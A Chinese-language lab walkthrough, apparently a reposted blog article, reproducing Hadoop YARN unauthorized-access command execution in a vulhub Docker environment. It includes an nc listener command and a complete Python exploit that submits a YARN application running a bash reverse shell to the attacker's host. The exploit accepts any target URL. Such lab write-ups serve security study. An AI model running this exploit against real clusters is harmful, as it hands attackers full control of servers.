數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.
Hadoop 未授權(quán)訪問主要是因為 Hadoop YARN 資源管理系統(tǒng)配置不當(dāng),導(dǎo)致可以未經(jīng)授權(quán)進行訪問,從而被攻擊者惡意利用。攻擊者無需認(rèn)證即可通過 RESTAPI 部署任務(wù)來執(zhí)行任意指令,最終完全控制服務(wù)器。
目錄:
數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.
Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞:
開啟?vulhub 靶場環(huán)境:
Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞測試:
Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞:
開啟?vulhub 靶場環(huán)境:
?第一步:切換到?vulhub 目錄下
cd vulhub
第二步:切換到 hadoop 目錄下
cd hadoop
第三步:切換到?unauthorized-yarn?漏洞目錄下.
第四步:開啟 漏洞 服務(wù).
docker-compose up -d
第五步:訪問? http:// (靶場 IP 地址):8088
? ?
Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞測試:
第一步:訪問 /cluster/apps 頁面【如果 該頁面存在的話,說明存在未授權(quán)訪問漏洞】
http://192.168.0.106:8088/cluster/apps
第二步:在 攻擊機(kali)設(shè)置監(jiān)聽.
nc -nvlp 8888
// 設(shè)置 監(jiān)聽 端口為8888
第三步:編寫 Python 執(zhí)行代碼.
import requests
def shell(url,vps_ip,port):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
}
response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
id = response.json()["application-id"]
data = {
'application-id': id,
'application-name': 'getshell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
},
},
'application-type': 'YARN'}
exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
print("[+] 執(zhí)行完成!")
if __name__ == '__main__':
url = input("目標(biāo)的URL:")
vps_ip = input("監(jiān)聽的主機IP地址(kali):")
port = input("監(jiān)聽的主機端口(kali):")
shell(url,vps_ip,port)
執(zhí)行代碼:
第四步:返回 監(jiān)聽的主機查看結(jié)果,發(fā)現(xiàn)已經(jīng)成功.
? ??
? ? ?
? ? ?
參考文章:Hadoop 漏洞復(fù)現(xiàn)_hadoop命令執(zhí)行漏洞-CSDN博客文章來源:http://www.zghlxwxcb.cn/news/detail-751660.html
學(xué)習(xí)鏈接:第55天:服務(wù)攻防-數(shù)據(jù)庫安全_Redis_Hadoop_Mysql_未授權(quán)訪問_RCE_嗶哩嗶哩_bilibili文章來源地址http://www.zghlxwxcb.cn/news/detail-751660.html
到了這里,關(guān)于數(shù)據(jù)庫安全:Hadoop 未授權(quán)訪問-命令執(zhí)行漏洞.的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!